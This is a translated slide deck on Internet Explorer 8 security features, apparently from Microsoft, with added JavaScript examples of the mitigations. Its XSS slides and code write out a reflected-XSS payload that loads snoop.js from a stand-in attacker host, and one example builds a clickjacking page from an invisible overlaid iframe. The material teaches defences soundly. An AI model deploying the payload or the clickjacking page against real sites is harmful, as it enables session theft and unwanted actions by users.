
Seguridad Corporativa Con Internet Explorer 8(1)

Published in: Technology

  1. Corporate Security with Internet Explorer 8
     Alejandro Ponicke, aponicke@microsoft.com
     Juan Ladetto, juanl@microsoft.com
  2. Agenda
     - Evolution of Internet Explorer. History.
     - The browser as the entry point for the threats that swarm across the Internet; responsible browsing.
     - Cross-site scripting (XSS exploits), ClickJacking and SmartScreen filtering.
     - The best help from the least expected place: the power of Group Policy for controlling IE.
     - Deployment optimization. Recommendations.
     - Extensibility: the "IE for Kids" use case.
     - Introduction to IEAK. Uses.
  3. Evolution of Internet Explorer
     Internet Explorer 1 – 15 August 1995
       Part of Microsoft Plus! (the Internet Jumpstart Kit in Plus!). Internet Explorer 1.5 ships a few months later and adds table rendering.
     Internet Explorer 2 – 22 November 1995
       Now supports SSL, cookies, VRML and newsgroups.
     Internet Explorer 3 – 13 August 1996
       Starts to become popular; the first browser to support CSS; Java and ActiveX controls are added; ships with other add-ons: Mail and News, NetMeeting and Address Book (the Internet and browsers start to become a target for hackers).
     Internet Explorer 4 – 17 September 1997
       Integrates with the OS: with Windows Desktop Update the Windows desktop becomes Active Desktop. Now supports Group Policy; Internet Mail becomes Outlook Express; MS Chat also ships with it.
  4. Evolution of Internet Explorer
     Internet Explorer 5 – 18 March 1999
       Included in Windows 98 SE. Now supports bidirectional text, XML, XSLT, ruby characters and MHTML, and best of all, AJAX is born (XMLHttpRequest). Last version for Mac and Unix.
     IE 5.5 adds 128-bit SSL, printing improvements, and standards-compliant HTML and CSS.
  5. Question
     When was Internet Explorer 6 released?
  6. Evolution of Internet Explorer
     Internet Explorer 6 – 27 August 2001
       Improvements in DHTML, inline frames, partial support for CSS 1, DOM 1 and SMIL 2.0; IEAK (it can now be customized). Support for this version ends in 2010.
     Internet Explorer 7 – 18 October 2006
       Web-standards improvements, tabbed browsing, search, the anti-phishing filter and several more.
     Internet Explorer 8 – 19 March 2009
       Security, ease of access, standards, RSS, CSS and AJAX are the priority. Rendering engines (IE7 mode).
     Internet Explorer 9 – ???
  7. IE8 architecture (diagram slide)
  8. Evolution & Change
     - Web 2.0: significant benefits & challenges
     - Blended threats shifting from the browser
     - Decreasing consumer trust and confidence
     - Data governance & regulations
     - Privacy & user preferences
     - Rapid pace of threat innovation
     - Organized crime on the rise
     (Chart: attacker spectrum by skill and motive, from amateur and script-kiddy through expert to specialist, and from curiosity and personal fame (vandal) through personal gain (thief / organized international crime) to corporate data & national interest (spy).)
  9. Security by the Numbers
     Perception vs. reality (chart slide)
  10. Top Concerns
      Top user concerns
      - Protection from intrusions
      - Protection from harm
      - Control over data / privacy
      Business concerns
      - Data governance / corporate IP
      - Business interruption / productivity
      - Impact to brand and consumer confidence
  11. Internet Explorer 8 Trustworthy Browsing (features spanning IE7 and IE8)
      Browser vulnerabilities: build on a secure foundation
      - Security Development Lifecycle (SDL)
      - Protected Mode
      - ActiveX controls
      - DEP (Data Execution Prevention)
      Web server & applications: extends browser protection to the web server
      - HttpOnly cookies
      - Group Policies
      - XDomainRequest (cross-domain requests)
      - XDM (cross-document messaging)
      - XSS Filter (cross-site scripting)
      - ClickJacking defense
      Social engineering & privacy: confidently bank, communicate & shop
      - Extended Validation (EV) SSL certificates
      - SmartScreen® Filter: blocks phishing & malware
      - Domain Highlighting
      - Enhanced Delete Browsing History
      - InPrivate™ Browsing & Blocking
  12. Browser Vulnerabilities
  13. Browser Vulnerabilities
      ActiveX hardening & enhancements: three questions asked before a control runs
      - Exploit controls: ActiveX killbits (IE5). Has the control been flagged as unsafe? (A killbit is a per-CLSID flag that stops the control from loading in the browser on any site.)
      - Can it be used? Opt-in (IE7). Is the control permitted to run in the browser without a prompt?
      - Where? Per-site ActiveX (IE8). Is the control permitted to run on this site?
  14. Browser Vulnerabilities
      ActiveX hardening & enhancements
      - Who? Per-user ActiveX (IE8): installing a control no longer requires administrator privileges, so no elevation to admin is needed.
      - Per-user installation can be disabled through Group Policy.
  15. Web Server & Applications
  16. Web Server & Applications
      Secure data exchange: cross-domain communication
      Same-origin policy
      - Permits scripts running on pages originating from the same site to access each other's methods and properties with no specific restrictions, but prevents access to most methods and properties across pages on different sites.
      - Workarounds can be dangerous & costly.
  17. Web Server & Applications
      Secure data exchange: investments in securing Web 2.0
      Cross-Domain Request (XDomainRequest)
      - Enables web developers to communicate between domains more securely
      - Provides a mechanism to establish trust between domains through an explicit acknowledgement of cross-domain sharing; both parties know which sites are sharing information
      - Proposed to the W3C for standardization
      Cross-Document Messaging (XDM)
      - Enables two domains to establish a trust relationship to exchange object messages
      - Gives web developers a more secure mechanism for building cross-domain communication
      - Part of the HTML5 specification
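The two slides above name the building blocks without showing them. The following is an added example, not code from the presentation: a same-origin check, the receiving and sending sides of cross-document messaging (postMessage), and the server side of a cross-domain request, written for Node.js so it runs offline. All origins, hostnames and messages are constructed test data. One assumption is labelled in the code: the cross-domain response answers with the requester's exact origin, which is the form CORS specifies; a public read-only resource could answer `*` instead.

```javascript
// Added example (not from the slides). Origins and messages are constructed.

// Same-origin policy: two URLs share an origin when scheme, host and port match.
// URL normalizes default ports, so https://a.example:443 equals https://a.example.
function sameOrigin(urlA, urlB) {
  return new URL(urlA).origin === new URL(urlB).origin;
}

// Receiving side of cross-document messaging (the onmessage handler).
// Trust is the origin allowlist: messages from anywhere else are dropped unread,
// and even trusted messages are parsed as data and validated, never executed.
function onCrossDocumentMessage(event, trustedOrigins) {
  if (!trustedOrigins.includes(event.origin)) {
    return { accepted: false, reason: 'untrusted origin ' + event.origin };
  }
  let data = event.data;
  if (typeof data === 'string') {
    try {
      data = JSON.parse(data);
    } catch (e) {
      return { accepted: false, reason: 'message is not JSON' };
    }
  }
  if (!data || typeof data !== 'object' || typeof data.type !== 'string') {
    return { accepted: false, reason: 'malformed message' };
  }
  switch (data.type) {
    case 'resize': {
      // Only a bounded integer height is acted on; anything else is ignored.
      const height = Number(data.height);
      if (!Number.isInteger(height) || height < 0 || height > 5000) {
        return { accepted: false, reason: 'height out of range' };
      }
      return { accepted: true, action: 'resize', height };
    }
    default:
      return { accepted: false, reason: 'unknown message type ' + data.type };
  }
}

// Sending side: name the partner's exact origin. If another document has been
// navigated into the target window, the browser discards the message instead
// of handing it to an attacker. A wildcard target is refused outright.
function sendToPartner(targetWindow, message, partnerOrigin) {
  if (partnerOrigin === '*') {
    throw new Error('refusing to postMessage to an unspecified origin');
  }
  targetWindow.postMessage(JSON.stringify(message), partnerOrigin);
}

// Server side of a cross-domain request (XDomainRequest in IE8, CORS elsewhere):
// the browser sends an Origin header and only releases the response to the page
// if the server answers with Access-Control-Allow-Origin. Answer only for origins
// on a fixed allowlist; echoing whatever Origin arrives would make the check
// meaningless. No header means the browser blocks the read.
// Assumption: the exact requesting origin is returned (a public resource may use '*').
function xdrResponseHeaders(requestOrigin, allowedOrigins) {
  if (!allowedOrigins.includes(requestOrigin)) {
    return {};
  }
  return { 'Access-Control-Allow-Origin': requestOrigin, Vary: 'Origin' };
}

// Demo with constructed data: an untrusted origin is rejected, a partner is served.
const trustedPartners = ['https://partner.woodgrovebank.com'];
console.log(onCrossDocumentMessage(
  { origin: 'https://hackersite.ie8demos.com', data: '{"type":"resize","height":300}' },
  trustedPartners));
console.log(onCrossDocumentMessage(
  { origin: 'https://partner.woodgrovebank.com', data: '{"type":"resize","height":300}' },
  trustedPartners));
console.log(xdrResponseHeaders('https://www.tailspintoys.com', ['https://www.tailspintoys.com']));
```

The receiver checks the origin before it even parses the payload; that ordering is the point of XDM's "trust relationship", and it is the step most real-world handlers skip.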
  18. Web Server & Applications
      XSS exploits: the new buffer overflow
      - Steal cookies & history
      - Log keystrokes
      - Deface sites
      - Steal credentials
      - Port-scan the intranet
      - Abuse browser/ActiveX vulnerabilities
      - Evade phishing filters
      - Circumvent HTTPS
      The XSS Filter neuters the attack: it blocks the malicious script from executing.
  19. XSS Demo (Web Server & Applications)
  20. Web Server & Applications
      Behind the scenes...
      Malicious URL in email contains an encoded string:
        http://www.woodgrovebank.co.uk/woodgrovebank.asp?SID=%22%3E%3C%73%63%72...
      The vulnerable application reflects it and adds a <script> tag to the page:
        <script for=window event=onload src="http://hackersite.ie8demos.com/snoop.js"></script>
      Generated signature (the pattern the filter matches between request and response):
        <SC{R}IPT¤src¤¤http¤¤¤hackersite¤ie8demos¤com¤snoop¤js¤>
      Neutered script (the tag name is altered so the browser no longer parses a script element):
        <SC#IPT src=http://hackersite.ie8demos.com/snoop.js>
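To make the "behind the scenes" sequence concrete, here is an added example, not code from the presentation: the reflected-XSS sink from the demo next to its output-encoded counterpart, the response headers that limit the damage when a sink is missed (the HttpOnly cookie from slide 11), and a toy model of the request/response reflection check the XSS Filter performs. The URL and payload are the slide's; the page markup and session id are constructed. The filter below is a simplification for illustration and is not IE8's actual signature logic.

```javascript
// Added example (not from the slides). Markup and session id are constructed;
// the payload and URL mirror the demo.

const PAYLOAD = '"><script for=window event=onload src="http://hackersite.ie8demos.com/snoop.js"></script>';
const ATTACK_URL =
  'http://www.woodgrovebank.co.uk/woodgrovebank.asp?SID=' + encodeURIComponent(PAYLOAD);

// Vulnerable: SID is written into an attribute untouched. The payload's leading
// "> closes the attribute and the tag, and the rest of it becomes live markup.
function renderVulnerable(sid) {
  return '<form><input type="hidden" name="SID" value="' + sid + '"></form>';
}

// Hardened: HTML-encode at the point of output, so the same bytes stay text.
function htmlEncode(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}
function renderSafe(sid) {
  return '<form><input type="hidden" name="SID" value="' + htmlEncode(sid) + '"></form>';
}

// Defense in depth for a missed sink: HttpOnly keeps the session cookie out of
// document.cookie, so "steal cookies" fails even when script does run, and
// X-XSS-Protection keeps the browser's filter enabled in block mode (0 turns it off).
function hardenedHeaders(sessionId) {
  return {
    'Set-Cookie': 'SID=' + sessionId + '; Path=/; Secure; HttpOnly',
    'X-XSS-Protection': '1; mode=block',
  };
}

// Toy reflection filter (simplified model, not IE8's signatures). For each
// query-string value that contains a <script> opening tag, check whether that
// exact tag text is reflected in the response. If it is, neuter it the way the
// slide shows, by breaking the tag name (<script ...> becomes <sc#ipt ...>) so
// the parser no longer sees a script element. Pairing request and response is
// what lets a browser-side filter act without any knowledge of the application.
const SCRIPT_OPEN_TAG = /<script\b[^>]*>/gi;

function reflectionFilter(requestUrl, responseBody) {
  const params = new URL(requestUrl).searchParams;
  let body = responseBody;
  let neutered = 0;
  for (const value of params.values()) {
    for (const tag of value.match(SCRIPT_OPEN_TAG) || []) {
      if (body.includes(tag)) {
        body = body.split(tag).join(tag.replace(/^(<sc)r/i, '$1#'));
        neutered += 1;
      }
    }
  }
  return { body, neutered };
}

// Demo: the vulnerable page is neutered, the encoded page needs no intervention.
console.log(reflectionFilter(ATTACK_URL, renderVulnerable(PAYLOAD)));
console.log(reflectionFilter(ATTACK_URL, renderSafe(PAYLOAD)));
```

Note what the filter cannot do: it only fires when the attack string appears in both the request and the response, so stored XSS and payloads that are transformed by the application pass through. Output encoding in `renderSafe` is the fix; the filter and HttpOnly are the safety net.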
  21. Web Server & Applications
      ClickJacking
      - A type of cross-site request forgery: entices users to click on content from another domain without the user realizing it.
      - An evolving attack that impacts all browsers; only IE8 has integrated protection.
      - Defense: add an X-FRAME-OPTIONS HTTP response header to pages that must not be framed.
      - Deny all framing (DENY) or allow framing only from same-origin hosts (SAMEORIGIN).
  22. Web Server & Applications
      ClickJacking (diagram slide)
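The following is an added example, not code from the presentation: what a clickjacking page looks like, the X-FRAME-OPTIONS header the slide recommends against it, and the decision a browser makes from that header. All URLs are constructed. The fail-closed handling of unrecognized header values is an assumption of this model, noted in the code; a real browser may simply ignore a value it does not understand.

```javascript
// Added example (not from the slides). URLs are constructed.

// The attack: the victim site's sensitive page is loaded in an invisible frame
// laid over a harmless-looking button, so the user's own click lands on the
// real "Transfer" button with the user's cookies attached.
function clickjackingPage(targetUrl) {
  return [
    '<button style="position:absolute;top:100px;left:100px">Win a prize</button>',
    '<iframe src="' + targetUrl + '" style="position:absolute;top:80px;left:60px;' +
      'width:400px;height:200px;opacity:0;z-index:10"></iframe>',
  ].join('\n');
}

// Server side: emit the header on every response for pages that act on clicks.
// DENY forbids all framing; SAMEORIGIN allows only a top-level page from the
// same origin. Anything else is rejected here rather than silently sent.
function frameOptionsHeader(policy) {
  const values = { deny: 'DENY', sameorigin: 'SAMEORIGIN' };
  const value = values[String(policy).toLowerCase()];
  if (!value) throw new Error('unsupported X-Frame-Options policy: ' + policy);
  return { 'X-Frame-Options': value };
}

function sensitivePageResponse(policy) {
  return {
    status: 200,
    headers: { 'Content-Type': 'text/html; charset=utf-8', ...frameOptionsHeader(policy) },
    body: '<form method="post" action="/transfer"><button>Transfer</button></form>',
  };
}

// Browser side: given the header on the framed response, the framed page's URL
// and the top-level document's URL, may the page render inside the frame?
// No header means yes, which is the default clickjacking relies on.
// Assumption of this model: an unrecognized value fails closed.
function framingAllowed(headerValue, framedUrl, topUrl) {
  if (headerValue === undefined || headerValue === null) return true;
  const value = String(headerValue).trim().toUpperCase();
  if (value === 'DENY') return false;
  if (value === 'SAMEORIGIN') return new URL(framedUrl).origin === new URL(topUrl).origin;
  return false;
}

// Demo: the bank page framed by an attacker page, with and without the header.
const BANK_PAGE = 'https://www.woodgrovebank.com/transfer';
const ATTACKER_PAGE = 'https://hackersite.ie8demos.com/prize';
console.log('no header  ->', framingAllowed(undefined, BANK_PAGE, ATTACKER_PAGE));
console.log('SAMEORIGIN ->', framingAllowed(
  sensitivePageResponse('sameorigin').headers['X-Frame-Options'], BANK_PAGE, ATTACKER_PAGE));
```

The header has to be on the framed page's response, not the attacker's: the bank decides who may frame it, and the browser enforces that decision on the attacker's page.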
  23. Social Engineering & Privacy
  24. Social Engineering & Privacy (screenshot slide)
      Microsoft Confidential – NDA Only
  25. Social Engineering & Privacy
      Perhaps a more effective warning?
  26. Social Engineering & Privacy
      EV SSL certificates: look for the green
      - Provide consumers added confidence and brands enhanced protection
      - Implemented by over 10,000 leading commerce, banking and transactional sites
  27. Social Engineering & Privacy
      Domain Highlighting
      - Helps users ascertain more accurately the domain of the site they are visiting
      - The domain is shown in black; the other characters of the address are gray
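The split that Domain Highlighting performs on an address, as an added example that is not code from the presentation. The public-suffix rules are a tiny stand-in (assumption: only the multi-label suffixes listed here); a browser uses the full public suffix list. The URLs are constructed to show the lookalike tricks the feature exposes: a long subdomain chain and credentials in the authority part.

```javascript
// Added example (not from the slides). Suffix list is a small stand-in; URLs are constructed.

// Suffixes under which a domain is registered one label deeper (e.g. co.uk).
// Assumption: only these; a real implementation uses the public suffix list.
const MULTI_LABEL_SUFFIXES = new Set(['co.uk', 'org.uk', 'com.ar', 'com.au', 'com.br']);

// The part of the hostname someone actually registered: the last two labels,
// or the last three under a multi-label public suffix.
function registrableDomain(hostname) {
  const labels = hostname.toLowerCase().split('.');
  if (labels.length < 2) return labels.join('.');
  const lastTwo = labels.slice(-2).join('.');
  const take = MULTI_LABEL_SUFFIXES.has(lastTwo) && labels.length > 2 ? 3 : 2;
  return labels.slice(-take).join('.');
}

// Splits an address into the gray prefix (scheme, credentials, subdomains),
// the black domain, and the gray remainder (port, path, query, fragment).
// IP literals have no registrable domain, so the whole host is highlighted.
function highlightDomain(address) {
  const url = new URL(address);
  const host = url.hostname; // already lowercased by the URL parser
  const isIpLiteral = /^\d{1,3}(\.\d{1,3}){3}$/.test(host) || host.startsWith('[');
  const domain = isIpLiteral ? host : registrableDomain(host);
  const subdomains = host.slice(0, host.length - domain.length); // '' or 'www.' etc.
  const credentials = url.username
    ? url.username + (url.password ? ':' + url.password : '') + '@'
    : '';
  return {
    gray: url.protocol + '//' + credentials + subdomains,
    domain,
    grayAfter: (url.port ? ':' + url.port : '') + url.pathname + url.search + url.hash,
  };
}

// Demo: the real bank, a subdomain lookalike, and a credentials lookalike.
for (const address of [
  'https://www.woodgrovebank.co.uk/login',
  'http://www.woodgrovebank.co.uk.hackersite.ie8demos.com/login',
  'http://www.woodgrovebank.co.uk@hackersite.ie8demos.com/',
]) {
  const parts = highlightDomain(address);
  console.log(parts.gray + '[' + parts.domain + ']' + parts.grayAfter);
}
```

In both lookalikes the black text reads `ie8demos.com`, which is exactly the cue the slide describes: the eye is drawn to the registrable domain rather than to the familiar bank name placed earlier in the address.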
  28. Social Engineering & Privacy
      SmartScreen™ Filter, offering dynamic protection from
      - Phishing
      - Malware
  29. SmartScreen Demo: Phishing & Malware (Social Engineering & Privacy)
  30. User Choice & Control (Social Engineering & Privacy)
      - Delete Browsing History
      - InPrivate Browsing
      - InPrivate Filtering
  31. Social Engineering & Privacy
      Delete Browsing History
      - New option to delete browsing history while retaining favorites
  32. Social Engineering & Privacy
      Third-party content serving
      - Over time, users' history and profiles can be aggregated without their knowledge
      - Any third-party content can be used like a tracking cookie
      - There is little end-user notification or control today
      - Syndicated photos, weather, stocks, news articles, local analytics, etc.
      - Unclear accountability for third-party security & privacy policies
      (Diagram: the user visits unique sites: Tailspintoys.com, Woodgrovebank.com, Farbrikan.com, Southridge1-1.com, Litware-bulk.com, adventureworks.com, Northwintd.com, Contoso.com, Prosware-sol.com; each page pulls content from the same 3rd-party syndicator web server, which therefore observes every visit.)
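The aggregation the slide describes, and the InPrivate Filtering response to it, as an added example that is not code from the presentation. The browsing history is constructed (site names follow the slide's fictional companies), and the threshold of 10 distinct first-party sites is the default InPrivate Filtering uses in its automatic mode.

```javascript
// Added example (not from the slides). History below is constructed.

const DEFAULT_THRESHOLD = 10; // InPrivate Filtering's default in automatic mode

// visits: [{ site: 'contoso.com', thirdParties: ['syndicator.example', ...] }]
// Returns a map from third-party host to the set of first-party sites on which
// it was loaded, i.e. the cross-site profile that host is in a position to build.
function thirdPartyExposure(visits) {
  const seenOn = new Map();
  for (const { site, thirdParties } of visits) {
    for (const host of new Set(thirdParties)) {
      if (host === site) continue; // first-party content cannot track across sites
      if (!seenOn.has(host)) seenOn.set(host, new Set());
      seenOn.get(host).add(site);
    }
  }
  return seenOn;
}

// Automatic mode: block third-party hosts seen on at least `threshold` sites.
function inPrivateBlockList(visits, threshold = DEFAULT_THRESHOLD) {
  return [...thirdPartyExposure(visits)]
    .filter(([, sites]) => sites.size >= threshold)
    .map(([host]) => host)
    .sort();
}

// Request-time check for a sub-resource on a page: block when the content is
// third-party to the page and its host is on the list.
function shouldBlock(pageHost, resourceHost, blockList) {
  return pageHost !== resourceHost && blockList.includes(resourceHost);
}

// Constructed history: ten distinct sites each embed the same syndicator; one
// also embeds an analytics host seen nowhere else, and each has its own image host.
const SITES = [
  'tailspintoys.com', 'woodgrovebank.com', 'fabrikam.com', 'southridge1-1.com',
  'litware-bulk.com', 'adventureworks.com', 'northwind.com', 'contoso.com',
  'prosware-sol.com', 'cohovineyard.com',
];
const VISITS = SITES.map((site) => ({
  site,
  thirdParties: ['syndicator.example', site === 'contoso.com' ? 'stats.example' : 'images.' + site],
}));

console.log('blocked:', inPrivateBlockList(VISITS)); // blocked: [ 'syndicator.example' ]
```

Only the syndicator crosses the threshold: the analytics host and the per-site image hosts each see one site and stay allowed, which is why the feature is aimed at aggregation rather than at third-party content as such.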
  33. InPrivate Demo (Social Engineering & Privacy)
  34. Centralized administration using Group Policy
  37. Deploying IE8
      - Microsoft Systems Management Software
      - Group Policy
      - Windows Update
      - Windows Server Update Services
      - Network shared folder
  38. Building our own IE (IEAK)
      - Accelerators. You can include custom default values for Accelerators in Internet Explorer 8.
      - Web Slices. You can add Web Slices to your custom Internet Explorer 8 package.
      - First-run wizard options and home page. You can configure the first-run experience for Internet Explorer 8.
      - Compatibility View. You can choose whether content is rendered in Internet Explorer 8 standards mode or Internet Explorer 7 mode. Note: by default, all sites in the Intranet zone are rendered in Internet Explorer 7 mode.
      - Search improvements. Internet Explorer 8 supports search providers that offer rich text and image suggestions. Through IEAK 8 you can add and configure these providers for your installer.
      - Many other Internet Explorer 8 features, such as InPrivate Filtering, Developer Tools and Delete Browsing History, can be customized on the Additional Settings page available in Corporate license mode.
  39. And now? Upgrading users and sites from IE6
      - Migrating is more than deploying a new version (but we need to take the step)
      - The changes are not simple, but...
      http://blogs.msdn.com/ie
      http://msdn.com/ie
      http://msdn.com/iecompat
      http://technet.microsoft.com/en-us/ie/bb219517.aspx
